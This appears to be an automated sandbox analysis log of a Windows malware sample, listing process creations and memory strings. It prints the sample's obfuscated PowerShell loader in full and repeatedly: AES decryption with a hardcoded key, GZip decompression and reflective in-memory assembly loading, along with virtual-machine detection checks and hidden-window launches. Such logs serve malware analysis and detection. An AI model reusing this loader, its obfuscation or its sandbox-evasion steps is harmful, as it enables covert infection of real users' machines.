'$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\payload.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 
'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:gudwtndyxkts{param([outputtype([type])][parameter(position=0)][type[]]$eysutohjudxedh,[parameter(position=1)][type]$wayesupnic)$posiitcnxqz=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+'f'+[char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[char](100)+''+[char](68)+''+[char](101)+''+[char](108)+''+'e'+'g'+[char](97)+''+'t'+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+'n'+''+'m'+''+'e'+''+[char](109)+'o'+[char](114)+''+'y'+'m'+[char](111)+''+[char](100)+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+'y'+'d'+''+'e'+''+[char](108)+'e'+[char](103)+''+'a'+'t'+[char](101)+''+[char](84)+''+[char](121)+''+'p'+'e',''+[char](67)+''+[char](108)+''+[char](97)+'s'+[char](115)+''+[char](44)+''+'p'+''+'u'+''+[char](98)+''+[char](108)+'ic'+','+'s'+[char](101)+''+'a'+''+[char](108)+''+[char](101)+''+[char](100)+''+','+''+[char](65)+''+'n'+''+[char](115)+'i'+[char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[char](65)+''+[char](117)+'t'+'o'+''+'c'+''+'l'+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$posiitcnxqz.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+[char](112)+''+[char](101)+'ci'+'a'+''+'l'+''+[char](78)+''+[char](97)+''+[char](109)+''+[char](101)+',h'+[char](105)+'d'+'e'+''+'b'+''+[char](121)+''+[char](83)+''+[char](105)+'g'+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+'i'+'c',[reflection.callingconventions]::standard,$eysutohjudxedh).setimplementationflags(''+[char](82)+'un'+[char](116)+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+'g'+''+[char](101)+''+'d'+'');$posiitcnxqz.definemethod(''+'i'+''+'n'+'v'+[char](111)+''+[char](107)+''+'e'+'',''+[char](80)+''+[char](117)+''+[char](98)
+''+[char](108)+''+[char](105)+''+[char](99)+''+','+''+[char](72)+''+[char](105)+''+'d'+''+'e'+''+[char](66)+''+[char](121)+''+[char](83)+''+'i'+''+[char](103)+''+[char](44)+''+'n'+''+[char](101)+''+'w'+''+[char](83)+''+[char](108)+'o'+[char](116)+''+','+''+[char](86)+''+[char](105)+''+[char](114)+''+'t'+'u'+[char](97)+'l',$wayesupnic,$eysutohjudxedh).setimplementationflags(''+[char](82)+'u'+[char](110)+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+'a'+'n'+''+'a'+''+[char](103)+'e'+'d'+'');write-output $posiitcnxqz.createtype();}$cxukrbomemwqm=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+'ys'+'t'+''+[char](101)+''+'m'+'.d'+[char](108)+''+[char](108)+'')}).gettype(''+'m'+''+[char](105)+'c'+[char](114)+''+[char](111)+''+[char](115)+''+[char](111)+''+'f'+'t'+[char](46)+''+[char](87)+''+[char](105)+''+'n'+''+[char](51)+''+[char](50)+''+'.'+''+'u'+''+[char](110)+''+[char](115)+''+[char](97)+''+[
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 
'c:\users\user\desktop\payload.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 
'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 41_2_0000000140002300
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 41_2_0000000140002300
Source: dwm.exe, 0000002D.00000000.2092393360.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002D.00000002.2639184711.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerd
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\cmd.exe Code function: 20_3_000002527DEC2AF0 cpuid 20_3_000002527DEC2AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
